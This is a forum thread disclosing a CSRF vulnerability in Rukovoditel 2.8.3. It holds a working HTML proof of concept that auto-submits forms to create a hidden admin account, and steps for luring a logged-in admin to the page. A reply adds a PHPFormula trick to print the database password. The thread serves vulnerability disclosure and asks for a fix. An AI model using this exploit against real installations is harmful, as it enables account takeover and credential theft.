CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

[TuongNC]

CSRF vulnerability on Rukovoditel 2.8.3

## Bug Description
Hi. I found a CSRF in the module add new user in Rukovoditel 2.8.3. Hacker can add new user with admin privilege.

## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF POC using the following code.

Code: Select all

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Cross Site Request Forgery</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 2;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
    
</script>

<H2>Cross Site Request Forgery</H2>

<form method="POST" name="form1" action="http://localhost//rukovoditel_2.8.3/index.php?module=users/validate_form">
<input type="hidden" name="username" value="admin1"/>
<input type="hidden" name="useremail" value="admin1@admin.com"/>


</form>

<form method="POST" name="form0" action="http://localhost//rukovoditel_2.8.3/index.php?module=items/&action=save">
<input type="hidden" name="path" value="1"/>
<input type="hidden" name="redirect_to" value=""/>
<input type="hidden" name="parent_item_id" value="0"/>
<input type="hidden" name="fields[5]" value="1"/>
<input type="hidden" name="fields[14]" value="default"/>
<input type="hidden" name="fields[6]" value="0"/>
<input type="hidden" name="fields[12]" value="admin1"/>
<input type="hidden" name="password" value="admin1pass"/>
<input type="hidden" name="fields[7]" value="admin1pass"/>
<input type="hidden" name="fields[8]" value="Name is Nothing"/>
<input type="hidden" name="fields[10]" value=""/>
<input type="hidden" name="fields[9]" value="admin1@admin.com"/>
<input type="hidden" name="fields[13]" value="english.php"/>

</form>
</form>

</body>
</html>

2. Replace the URI to path to Rukovoditel 2.8.3 folder and change password field.
3. Send the link script to the victim (admin) to make them click.
4. Login with new user.


## Server Information

Xampp on Windows 10

### PHP Operating System

Windows NT DESKTOP-BDPIT37 10.0 build 18363 (Windows 10) AMD64

### PHP Version

PHP Version 7.4.15

[marajah]

Hi, Tuong

It works, but in my case I had to put the php file with the malicious code in the same server. Also, it worked when the connection was on the same protocol (HTTPS).

This means that (in my case, with my server configuration and the Samesite property of my cookies set on true) it is harder to achieve, but not too much. It can be done by someone having writing permission on a public folder, or by a user uploading a file with the php content included.
But in many other installation it could be a more serious problem, I guess; especially where guest users are allowed to register and upload files.
The only thing you have to do is to make someone with the permissions to create users opening the malicious page, while connected.
At the end you will have a new admin user, ready to be used to login without nobody knowing it.

@support
I'm not skilled enough to figure out how to solve, but maybe a token could help to protect the session (considering that it cannot be put in the malicious form)?

[TuongNC]

Hi, Tuong

It works, but in my case I had to put the php file with the malicious code in the same server. Also, it worked when the connection was on the same protocol (HTTPS).

This means that (in my case, with my server configuration and the Samesite property of my cookies set on true) it is harder to achieve, but not too much. It can be done by someone having writing permission on a public folder, or by a user uploading a file with the php content included.
But in many other installation it could be a more serious problem, I guess; especially where guest users are allowed to register and upload files.
The only thing you have to do is to make someone with the permissions to create users opening the malicious page, while connected.
At the end you will have a new admin user, ready to be used to login without nobody knowing it.

@support
I'm not skilled enough to figure out how to solve, but maybe a token could help to protect the session (considering that it cannot be put in the malicious form)?

Yes, in this case, we need admin have session cookie click the link.

[support]

Again you are tesing with localhost and Xampp. By default session are the same for all localhost folders that is why you can send request form html form if there is logged users in http://localhost//rukovoditel_2.8.3/
But in live server you can't do it.

[TuongNC]

Again you are tesing with localhost and Xampp. By default session are the same for all localhost folders that is why you can send request form html form if there is logged users in http://localhost//rukovoditel_2.8.3/
But in live server you can't do it.

In live server, I just need ADMIN click to my link and go to my website, method POST will be trigger.

[support]

You can't do any action if you are not logged. So any html files like this will redirect to login.

[TuongNC]

Yes, if user has been logged in?

[marajah]

You can't do any action if you are not logged. So any html files like this will redirect to login.

It's not the attacker that needs to be logged, but the victim. When the victim is logged and click on the page, the actions will be done on behalf of the victim
https://en.wikipedia.org/wiki/Cross-sit ... st_forgery
There are some public database of the exploits of this and other types that could be directed to Rukovoditel. Probably they are not crazily dangerous, but I'm not skilled enough to say
https://packetstormsecurity.com/search/?q=rukovoditel
https://www.exploit-db.com/
https://www.cvedetails.com/product/5413 ... r_id=19833

[TuongNC]

You can't do any action if you are not logged. So any html files like this will redirect to login.

It's not the attacker that needs to be logged, but the victim. When the victim is logged and click on the page, the actions will be done on behalf of the victim
https://en.wikipedia.org/wiki/Cross-sit ... st_forgery
There are some public database of the exploits of this and other types that could be directed to Rukovoditel. Probably they are not crazily dangerous, but I'm not skilled enough to say
https://packetstormsecurity.com/search/?q=rukovoditel
https://www.exploit-db.com/
https://www.cvedetails.com/product/5413 ... r_id=19833

Nice comment <3

[swar]

This looks like a critical security bug requiring an immediate patch. Typical basic CSRF vulnerability.

It does not matter that attacker is not logged in, the problem is that attacker can easily achieve that the script is activated by a logged-in user, e.g. by sending the admin a link to a malicious page by e-mail. If the admin clicks the link, the attacker has succeeded.

Even worse is that it seems to me (I have not tested it) that Rukovoditel is not protected against CSFRs at all. If so, any available actions could be activated by an attacker using this technique, everything you can imagine. Adding new entries, adding new fields, deleting entities, changing admin's email and password ... countless options.

@TuongNC Did you have a chance to tests other forms in the app?
@support Please fix this asap. Also, please confirm that there are measures against CSFR in the Rukovoditel and there are no other forms with this vulnerability.

Edit: Vulnerability is real, I just successfully reproduced this. No need for the same domain, it works even if the code is somewhere else. Malicious script on localhost hacked my rukovoditel 2.8.3 running on professional webhosting with SSL. With this, the attacker will gain access to the admin's account. Then he can simply create field type PHPFormula in any entity, input code

Code: Select all

echo DB_SERVER_PASSWORD;

and then he has also you db password.